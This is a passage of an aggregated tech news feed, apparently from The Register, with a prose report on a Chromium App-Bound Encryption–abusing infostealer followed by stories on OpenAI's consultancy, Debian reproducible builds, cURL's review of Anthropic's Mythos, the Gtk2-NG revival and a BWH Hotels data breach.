IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: Linux fréttir
OpenAI can't have incompetent AI consultants ruining the market, so bought its own
OpenAI can’t have inexperienced consultants derailing the AI hype train, so it’s launching a consultancy of its own to help enterprises find the value in its models necessary to justify the spending, revenue that Sam Altman's company desperately needs to cover its infrastructure costs. To support the endeavor, OpenAI has agreed to acquire UK-based AI consulting firm Tomoro. The terms of the acquisition weren’t disclosed. Tomoro will form the backbone of the OpenAI Deployment Company, which will operate as a standalone business unit tasked with helping enterprises find the value that they've been missing from the AI flag bearer's models. But don’t worry, McKinsey. OpenAI’s new Forward Deployed Engineers (FDEs) are only there to make sure you don’t sour enterprises on AI by dragging them down an expensive rabbit hole that fails to deliver value. The new company is backed by the usual assortment of AI-crazed venture capitalists and private equity firms, but several consultancies, including Capgemini, Bain, and yep, McKinsey, have agreed to plow billions into the venture. OpenAI says that its AI consultancy will launch with more than $4 billion of investments. Presumably, these consultancies will call in OpenAI’s FDEs when they need help proving AI can boost productivity and/or cut payroll. According to OpenAI, a typical enterprise engagement will look a bit like this: OpenAI’s FDEs will launch a diagnostic to determine where AI can create the most value, then carry out a select set of PoCs. If successful, the FDEs will then design, build, and deploy production systems that tie into enterprises' existing customer data and tools. The experience gained from these integrations will no doubt be used to improve OpenAI’s models and services. The acquisition of Tomoro would bring approximately 150 FDEs and deployment specialists into OpenAI’s new consultancy unit. The deal is expected to close in the coming months, subject to regulatory approvals. Whether enterprises should hitch their saddle to OpenAI’s success at a time when inference providers and model devs are already jacking prices in an effort to get their infrastructure costs under control is another matter entirely. As we reported last week, with the launch of GPT-5.5, OpenAI once again increased its API pricing. For one million tokens, GPT-5.5 is priced at $5 (input), $0.50 (cached input), and $30 (output), double that of its predecessor. But don’t worry, OpenAI says the model might be more frugal about how it uses those tokens. ®
Categories: Linux fréttir
Debian 14 cracks down on unreproducible packages
About halfway through the Debian 14 “Forky” development process, its release team announced a new goal: deterministic package compilation. The Debian project’s latest Bits from the release team newsletter has a goal which may not sound very big, but will mean significant extra effort in a direction that could prove to be a valuable extra security measure. "Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages," wrote ReleaseTeam member Paul Gevers. "Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility." Of the two links in that paragraph, the independent Reproducible Builds project does not, in this vulture’s humble opinion, explain what it’s all about very clearly. We feel that Debian’s own Reproducible Builds wiki page does it better: It should be possible to reproduce, byte for byte, every build of every package in Debian. The Wikipedia article also has a good clear explanation, and introduces a helpful synonym: deterministic compilation. In other words, if you use the same version of the same compiler with the same options, then every time you compile an identical set of source files, the process ought to result in an identical set of binary files. This is starting to become an industry trend – for instance, when we reported on the release of FreeBSD 15 late last year, we noted that it too now promises reproducible builds. Reproducible builds in Debian have been a long time coming: The Register first reported on Debian’s efforts in this direction way back in 2015. It’s not an easy task, but it’s a useful security measure. The idea is to ensure that binaries have not been tampered with – for instance, modified to insert malware. It permits an additional verification step, so that users or automated tools can check whether the binaries they (or their OS package manager) downloaded are byte-identical to the ones they can compile themselves. Without this, you just have to trust the distributor who compiled your OS – as Ubuntu “self-appointed benevolent dictator for life” Mark Shuttleworth pointed out in 2012. (The Internet Archive has a copy of his long-gone blog post.) We also mentioned reproducible builds when we looked at NixOS Raccoon back in 2022, and tried to explain why it was a desirable thing. (Around the same time, Rocky Linux CEO Greg Kurtzer also told us that it was part of the plan for that project, too.) NixOS is already a little further down the reproducibility trail, and as we reported on its add-on Flox deployment tool in 2024, it also aims to deliver reproducible deployments. This won’t directly make Debian safer. It’s already one of the safer and more stable Linux distros there are, anyway. Instead, it’s about infrastructure changes that make it easier to check the supply chain, and to make it possible to write software that can check and verify that what you’re getting really is what you thought that you were getting. If it all works, you won’t be able to tell any difference – but auditing tools will. Debian 13 came out last August, and so Debian 14 is expected in about a year – although it does not have to stick to a rigorous fixed schedule like the commercially-backed projects. ®
Categories: Linux fréttir
Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.” cURL code is no stranger to AI To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate to see how effective Mythos can really be at finding more than the average AI. As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.” Mythos isn’t any more creative than its creators Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: Linux fréttir
Gtk2-NG, next generation of Gtk 2, comes back to life
An effort to revive and reinvigorate the 2002 Gtk2 GUI programming toolkit is growing and gaining interest… as we predicted would happen a few months ago. The gtk2-ng project is reviving and modernizing Gtk2 version 2, which the GNOME developers declared dead back in 2020. We held off on reporting this for a while to see if the idea would gain some support, and it does seem to winning interest and followers. Reviving a 24-year-old toolkit that reached its official end-of-life six years ago is a retrospective sort of undertaking, and as such, it appeals to some modern-but-nostalgic development projects. Development is hosted on the Git instance of the Devuan project, the systemd-free fork of Debian. (Last year, Devuan announced its support of Xlibre, the X.org fork that aims to re-invigorate X11 development.) However, developer Daemonratte announced the fork in a thread on the forums of the Pale Moon browser: GTK2 revival. Pale Moon, as we described in 2021, is a continuing fork of an early version of Firefox. Back in February, when we covered the news that Debian 14 planned to drop Gtk2, we mentioned that this might provide the impetus for a fork. This isn’t the first such fork, and we mentioned then that the Ardour digital audio workstation we last looked at in 2022 maintains its own internal version called YTK. Daemonratte says that they’ve already incorporated some fixes from that, and also from an earlier fork by stefan11111 which has been inactive for a couple of years. They then outline the current goals: Current status: Making it Y2K38-safe Getting rid of all deprecation warnings Patching it for NetBSD and backporting NetBSD-specific patches Testing it on all kinds of hardware Further modernization without breaking ABI Future plans: Implement touch support and smooth scrolling from Ardour’s ytk without breaking ABI, so Ardour can be compiled against gtk2 again Heavily lobby for its adoption in the BSD and systemdfree Linux world Reimplement GtkMozEmbed for UXP, so this wonderful engine can be used in gtk2 projects Gtk originally stood for GIMP Tool Kit: 30 years ago, when the GIMP image editor made its public début, Gtk was the set of tools GIMP’s authors created to make it easier to write GUI apps in C. Six years later, GTK+ 2.0.0 appeared. The new plus symbol in its name represented a new object-oriented design. When Miguel de Icaza announced the GNOME desktop project in 1997, it adopted Gtk instead of the then-semi-commercial Qt that KDE used. Since then, Gtk has been developed along with GNOME. GIMP development is relatively slow: the team finally released version 3.0 a year ago, and it uses Gtk 3. (Last month, it released version 3.2.4.) Since launch, though, the GNOME project has released 39 numbered versions, and in recent decades Gtk has kept pace with GNOME, not GIMP. The last version of Gtk 2 was GTK+ 2.24.0 in 2012. The GNOME developers officially said it was end-of-life with the release of Gtk 4 in 2020. Gtk2-ng is far from the only project to fork and revive an older version of a project which has since been superseded by newer versions from the original team. One of the obvious ones is the MATE desktop, which Argentinian developer Perberos announced in 2011. Saying that, though, Daemonratte stated: "The ultimate vision of this fork is to keep gtk2 alive for software using it right now and to revive gtk2 versions of […] Gnome2 […]. Yes, I don’t have to do this alone and no, Mate is not an option, because they use gtk3 now." It is very much not alone. We have been covering releases of KDE 3 fork the Trinity desktop environment since version 14.0.11 in 2021. This vulture used KDE 1.x back when it was the state of the Linux art, and for us, KDE 3.x was already too big and complicated. For the KDE project’s 20th anniversary in 2016, Brazilian developer Helio Chissini de Castro modernized KDE 1 so that it would build and run on Fedora 25. We didn’t realize this had become an ongoing effort, but it has. From later in the Gtk-ng thread, we learned about MiDesktop, a continuing project based on Osiris, a modernized Qt 2. ®
Categories: Linux fréttir
BWH Hotels guests warned after reservation data checks out with cybercrooks
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. Navigate to sites directly rather than clicking links." ®
Categories: Linux fréttir
